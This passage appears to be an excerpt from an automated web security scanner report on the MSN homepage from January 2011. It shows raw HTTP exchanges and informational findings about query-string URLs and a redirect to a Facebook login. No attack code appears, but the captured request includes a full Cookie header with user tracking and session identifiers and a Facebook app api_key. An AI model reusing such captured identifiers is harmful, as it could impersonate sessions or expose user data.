http://www.bing.com/shopping/content/search?q=Cupcake+Stand&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&gt1=36010
http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&gt1=36010
http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON
http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 45617
Content-Length: 45617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNHPT">Saturday, January 29, 2011</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41327694/ns/us_news/?GT1=43001"><img src="http://col.stb.s-msn.com/i/1C/562F924B0BFF0EF9E7EB8EAB7627.jpg" title="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" width="206" height="144" alt="Image: Gen. James Cartwright holds a news briefing and update on the Don't Ask Don't Tell repeal implementation at the Pentagon, Friday (.. Chip Somodevilla/Getty Images)" /></a>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001"><img src="http://col.stb.s-msn.com/i/C1/EC55D18C76E570E2D9F5B31996EFBC.jpg" title="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" width="206" height="144" alt="Image: File photo of King Tutankhamun's golden mask displayed at the Egyptian museum in Cairo (.. Khaled Desouki/AFP/Getty Images)" /></a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002"><img src="http://col.stb.s-msn.com/i/F9/5BC51AED48AF6FAE2ADD2AF77F074.jpg" title="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" width="206" height="144" alt="Image: File photo of Philadelphia Flyers goalie Michael Leighton looking for the puck after giving up the game-winning goal to Chicago Blackhawks Patrick Kane in overtime of the NHL Stanley Cup hockey finals (.. Matt Slocum/AP)" /></a><a href="http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002">FBI helps with missing puck</a>
...[SNIP]...
<a href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001"><img src="http://col.stb.s-msn.com/i/97/46C217C8DB39C2D6289FA229C0D5BD.jpg" title="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" width="303" height="211" alt="Image: Frustrated woman holding a telephone (.. Compassionate Eye Foundation/Chris Newton/OJO Images Ltd/Getty Images)" /></a>
...[SNIP]...
<a href="http://dating.msn.com/en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000"><img src="http://col.stb.s-msn.com/i/62/47BC124184233113131B97F8F8359E.jpg" title="Image: Couple playing football (.. Jamie Grill/Getty Images)" width="293" height="144" alt="Image: Couple playing football (.. Jamie Grill/Getty Images)" /></a>
...[SNIP]...
<li style="width:293px;" class="last"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000"><img src="http://col.stb.s-msn.com/i/42/40224F9769E8AD5EA8F8A624E74A.jpg" title="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" width="293" height="144" alt="Image: Couple in restaurant (.. Commercial Eye/Getty Images)" /></a><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000">Women: Find a guy who's just like you </a>
...[SNIP]...
<a href="http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017"><img src="http://col.stb.s-msn.com/i/40/6087ED1789141E9E7E7476F7D2A816.jpg" title="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" width="303" height="211" alt="Image: 2011 Ford-F150 Harley-Davidson (.. Ford Motor Company)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/slideshow.aspx?cp-documentid=26575521&GT1=35006"><img src="http://col.stb.s-msn.com/i/2A/D52DA0C2C7D0F37DBB382A8318106A.jpg" title="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" width="303" height="211" alt="Image: Raleigh, N.C. (.. Visions of America LLC/Alamy)" /></a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<a href="http://fitbie.msn.com/eat-right/tips/stock-your-refrigerator-weight-loss?gt1=50002"><img class="landscape" src="http://col.stb.s-msn.com/i/6D/94835E23C59DA9988832DB01F.jpg" title="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" width="303" height="117" alt="Image: Woman standing in front of refrigerator (.. Gerda Genis/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5"><img class="landscape" src="http://col.stb.s-msn.com/i/A4/C9F6DB1429C482320999B20976453.jpg" title=" Image: Man shredding paper (.. James Darell/Getty Images) " width="128" height="73" alt=" Image: Man shredding paper (.. James Darell/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/25/0E3EF1611A1E83275679938D78B0.jpg" title="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" width="128" height="73" alt="Image: Woman with laundry basket (.. Jupiterimages/Getty Images)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010"><strong>
...[SNIP]...
<p>Bing: Mixing it up <a href="http://www.bing.com/search?q=how+to+make+your+own+laundry+detergent&form=msnhed&GT1=36010">on your own is easy</a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067"><img class="portrait" src="http://col.stb.s-msn.com/i/B7/CA0287F24D531F31B28EDED6FF651.jpg" title="Image: Accent pillows (.. redcover.com/Getty Images)" width="116" height="175" alt="Image: Accent pillows (.. redcover.com/Getty Images)" /></a>
...[SNIP]...
<a href="http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx?cp-documentid=27338469&gt1=32002"><img class="landscape" src="http://col.stb.s-msn.com/i/79/3D0CF24EE45332AEC818733145573.jpg" title="Image: Woman with curly hair style (Courtesy of Essence) " width="128" height="73" alt="Image: Woman with curly hair style (Courtesy of Essence)" /></a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/collegebasketball/scores"><img class="landscape" src="http://static.foxsports.com/content/fscom/img/2011/01/29/012911-CBK-Louisville-TWICE-AS-NICE-JW-PI_20110129151135131_303_117.JPG" width="303" height="117" alt="Image: Louisville Cardinals (Fred Beckham/AP)" /></a></div><div><a href="http://msn.foxsports.com/collegebasketball/scores">Live: Upsets abound in college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/story/Farmers-Insurance-Open-Phil-Mickelson-Tiger-Woods-Bill-Haas-012911">How is Tiger Woods doing in 2011 season debut?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911">NBA star blames gas station stop for positive test</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911">Yankees boss to rival: Keep your team 'off welfare'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911">Report: Olympic swimming star making comeback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911">Suspensions handed down after NBA brawl</a><span class="piped"> | <a href="http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911">Pics</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911">Shaq in green adds twist to Lakers-Celtics rematch</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88&yr=2011">Where are top college football prospects headed?</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/80/2FF81810DDCE8AD3FEECAFC567B1FA.jpg" title="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" width="303" height="117" alt="Image: Video still of reporter talking to citizen about snow (.. WMUR Manchester)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">'Hey, guess what! It's snowing!' </a>
...[SNIP]...
<p>A New Hampshire news crew hits the snowy streets to make sure the locals <a href="http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">aren't fooled</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/1F/B5E89286961128824C7AE6885EC.jpg" title="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" width="128" height="73" alt="Image: Video still of Chris Colfer as Riff Raff in the 'Rocky Horror Picture Show' episode of 'Glee' (.. 20th Century FOX)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007"><strong>
...[SNIP]...
<p>Go <a href="http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs?rs=glee&from=en-us_msnhp&form=MSNRLL&GT1=42007">behind the scenes</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/6A/5F94C974FCBAE14AFF1F886AE8B.jpg" title="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" width="128" height="73" alt="Image: Video still of Rukwa the black rhino eating her birthday cake (.. U-Zoo)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007"><strong>
...[SNIP]...
<p>There's a <a href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007">treat in store</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001"><img class="portrait" src="http://col.stb.s-msn.com/i/B5/F9DAF1B9A4431DBA728B9CFFBAAF3.jpg" title="Image: DiGiorno's pizza & cookies combo (Courtesy of Delish)" width="116" height="175" alt="Image: DiGiorno's pizza & cookies combo (Courtesy of Delish)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">Pizza & cookie dough: Gross or good?</a>
...[SNIP]...
<p>DiGiorno debuts what is either the <a href="http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001">tastiest or most tasteless</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science?GT1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/8B/97F3ADB0E857BC24D9E8B13F3984.jpg" title="Image: Boy on fence (.. Charlie Roy/Getty Images)" width="128" height="73" alt="Image: Boy on fence (.. Charlie Roy/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010"><img class="landscape" src="http://col.stb.s-msn.com/i/56/AE3B1E3A7AE6E076D8253197D1489B.jpg" title="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" width="128" height="73" alt="Image: Mary-Lu Zahalan-Kennedy (.. Alan Edwards/Liverpool Hope University/AP)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010"><strong>
...[SNIP]...
<p>A UK university has awarded one woman a <a href="http://www.bing.com/search?q=first+Beatles+degree&form=msnhed&GT1=36010">special degree</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON">37 steals & deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010"><img src="http://col.stb.s-msn.com/i/9A/ADE8D0D0F6E1E0938CFDB1EA5D949E.jpg" title="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " width="75" height="128" alt="Image: Model wearing cap sleeve dress (Courtesy of Nordstrom) " /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/shopping/content/search?q=Cocktail+Dresses%3a+Silk+Organza+Strapless+Dress&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_image_jl0125_1x1&gt1=36010">Flirty dresses for Valentine's Day </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=NFL+Jerseys%3a+Brett+Favre&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet2_jl0125_1x1&gt1=36010">Popular NFL players' jerseys </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Cupcake+Stand&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet3_jl0125_1x1&gt1=36010">Bake cute, tasty cupcakes at home </a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping/content/search?q=Weight+Loss%3a+Glaxo+Smith+Kline+Alli&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet4_jl0125_1x1&gt1=36010">Diets that take weight off </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/shopping/content/search?q=Hair+Loss+Remedy%3a+Spectral+DNC+Topical+Hair+Loss+Treatment&form=MSHINA&publ=MSNHPSPOT&crea=TEXT_MSHINA_CORE_Bullet5_jl0125_1x1&gt1=36010">Which hair loss remedies really work? </a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.434. http://www.redacted/scp/AuthServiceFacebook.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/scp/AuthServiceFacebook.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/scp/AuthServiceFacebook.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following link to another domain:

http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d

Request

GET /scp/AuthServiceFacebook.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:53:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 678

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.redacted%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d">here</a>
...[SNIP]...

22.435. http://www.redacted/scp/AuthServiceFacebookLogOff.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/scp/AuthServiceFacebookLogOff.aspx

Issue detail

The page was loaded from a URL containing a query string:

